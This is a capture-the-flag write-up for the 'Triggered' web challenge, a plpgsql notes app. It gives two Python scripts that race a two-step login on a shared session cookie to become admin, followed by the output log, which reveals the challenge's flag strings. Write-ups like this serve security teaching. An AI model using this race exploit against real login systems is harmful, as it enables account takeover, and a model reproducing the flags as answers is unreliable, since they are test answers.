Problem Description
Triggered - Web (280 pts)
I stared into the abyss of microservices, and it stared back. I found something utterly terrifying about the chaos of connections.
"Screw this," I finally declared, "why have multiple services when the database can do everything just fine on its own?"
And so on that glorious day it came to be that everything ran in plpgsql.
Write-up
The two scripts below have to run at the same time: the exploit is a race between them. Login is a two-step flow (POST the username to /login, then the password to /login/password), so the first script logs in with a known account (searchtheflag / test) using a fixed session cookie and keeps searching for "flag", logging in again whenever it is bounced back to /login. The second script keeps POSTing username=admin to /login with the very same session cookie. When one of those admin username writes lands inside the login's race window, the session ends up treated as admin's, and the next search returns admin's notes; the first script spots that by the "Hey there, admin" greeting on the search page and stops.
First Code:
import requests

def request_post(url, cookies, data):
    r = requests.post(url, cookies=cookies, data=data)
    # A search page that greets us as admin means the race was won
    if r.url == "http://triggered.pwni.ng:52856/search":
        if "Hey there, admin" in r.text:
            print(r.text)
            print("[-] Result: Found out!")
            exit()
    return r

def signin(cookies):
    # two-step login: the username is set first, the password checked second
    data = {'username': 'searchtheflag'}
    url = "http://triggered.pwni.ng:52856/login"
    request_post(url, cookies, data)
    data = {'password': 'test'}
    url = "http://triggered.pwni.ng:52856/login/password"
    request_post(url, cookies, data)
    print("[-] Sign-in: Okay")

if __name__ == "__main__":
    cookies = {
        'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b"  # your session
    }
    signin(cookies)
    while True:
        # keep searching for the flag with the same session cookie
        data = {'query': 'flag'}
        url = "http://triggered.pwni.ng:52856/search"
        r = request_post(url, cookies, data)
        print("[-] Search: in progress")
        # bounced back to /login: the other script reset the session, log in again
        if r.url == "http://triggered.pwni.ng:52856/login":
            signin(cookies)

Second Code:
import requests

def request_post(url, cookies, data):
    r = requests.post(url, cookies=cookies, data=data)
    return r

def signin_admin(cookies):
    # only the username step, with "admin", on the same session as the first script
    data = {'username': 'admin'}
    url = 'http://triggered.pwni.ng:52856/login'
    request_post(url, cookies, data)

if __name__ == "__main__":
    cookies = {
        'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b"  # your session
    }
    # hammer the login endpoint until the first script reports a win
    while True:
        signin_admin(cookies)

Result & Flag:
[-] Sign-in: Okay
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
<html>
<head>
<link rel="stylesheet" href="/static/styles.css" />
<link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700,700i,900,900i" rel="stylesheet">
</head>
<body>
<header>
<a href="/" class="left">
<h1>pgNotes</h1>
<h2>Let's keep it PG, ok?</h2>
</a>
<div class="right">

<nav>
<div class="welcome">Hey there, admin</div>
·
<a href="/search">Search notes</a>
·
<a href="/note/new">New note</a>
·
<a href="/logout">Logout</a>
</nav>

</div>
</header>
<main>
<section class="search-input">
<h3>Search</h3>
<form method="POST" action="/search">
<div class="input">
<label>Query</label>
<input type="text" name="query" />
</div>
<div class="input submit">
<input type="submit" />
</div>
</form>
</section>

<section class="search-query">
Results for <span class="query">flag</span>
</section>


<section class="note">
<section class="header">
<h4>Flag</h4>
<div class="author">admin</div>
<div class="date">02:44pm on April 13, 2019</div>
</section>
<section class="content">
<p>
PCTF{i_rAt3_p0sTgRE5_1O_oUT_0f_14_pH_n3ed5_m0Re_4Cid}
</p>
</section>
</section>

<section class="note">
<section class="header">
<h4>flag</h4>
<div class="author">admin</div>
<div class="date">08:11am on April 14, 2019</div>
</section>
<section class="content">
<p>
PCTF{cr4zy_70_m4k3_w3b_4ppl1c4710n_w17h_plp65ql}
</p>
</section>
</section>

<section class="note">
<section class="header">
<h4>flag</h4>
<div class="author">admin</div>
<div class="date">04:51pm on April 14, 2019</div>
</section>
<section class="content">
<p>
PCTF{PsQl_w3bs3rv3rf0rh1pst3r_l0l}
</p>
</section>
</section>

<section class="note">
<section class="header">
<h4>Flag</h4>
<div class="author">admin</div>
<div class="date">06:55pm on April 14, 2019</div>
</section>
<section class="content">
<p>
PCTF{pGn0Te2_Lets_k22P_1t_PG_oK}
</p>
</section>
</section>



</main>
</body>
</html>
[-] Result: Found out!
Thanks @gP4yload